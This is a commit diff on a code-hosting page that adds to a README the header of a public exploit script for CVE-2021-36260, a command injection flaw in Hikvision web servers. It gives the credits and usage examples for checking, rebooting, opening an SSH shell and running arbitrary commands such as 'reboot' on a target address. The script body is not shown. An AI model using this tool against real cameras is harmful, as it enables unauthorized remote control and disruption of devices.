crash.software
Projects
Pull Requests
Issues
Builds
CVE-2021-36260
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY CVE-2021-36260 Commits 5645bf9a
🤬
  • ■ ■ ■ ■ ■ ■
    README.md
    1 1  # CVE-2021-36260
    2 2  command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.
    3 3   
     4 +# Exploit Title: Hikvision Web Server Build 210702 - Command Injection
     5 +# Exploit Author: bashis
     6 +# Vendor Homepage: https://www.hikvision.com/
     7 +# Version: 1.0
     8 +# CVE: CVE-2021-36260
     9 +# Reference: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html
     10 + 
     11 +# All credit to Watchful_IP
     12 + 
     13 +#!/usr/bin/env python3
     14 + 
     15 +"""
     16 +Note:
     17 +1) This code will _not_ verify if remote is Hikvision device or not.
     18 +2) Most of my interest in this code has been concentrated on how to
     19 + reliably detect vulnerable and/or exploitable devices.
     20 + Some devices are easy to detect, verify and exploit the vulnerability,
     21 + other devices may be vulnerable but not so easy to verify and exploit.
     22 + I think the combined verification code should have very high accuracy.
     23 +3) 'safe check' (--check) will try write and read for verification
     24 + 'unsafe check' (--reboot) will try reboot the device for verification
     25 + 
     26 +[Examples]
     27 +Safe vulnerability/verify check:
     28 + $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check
     29 + 
     30 +Safe and unsafe vulnerability/verify check:
     31 +(will only use 'unsafe check' if not verified with 'safe check')
     32 + $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check --reboot
     33 + 
     34 +Unsafe vulnerability/verify check:
     35 + $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --reboot
     36 + 
     37 +Launch and connect to SSH shell:
     38 + $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --shell
     39 + 
     40 +Execute command:
     41 + $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd "ls -l"
     42 + 
     43 +Execute blind command:
     44 + $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd_blind "reboot"
     45 + 
Please wait...
Page is in error, reload to recover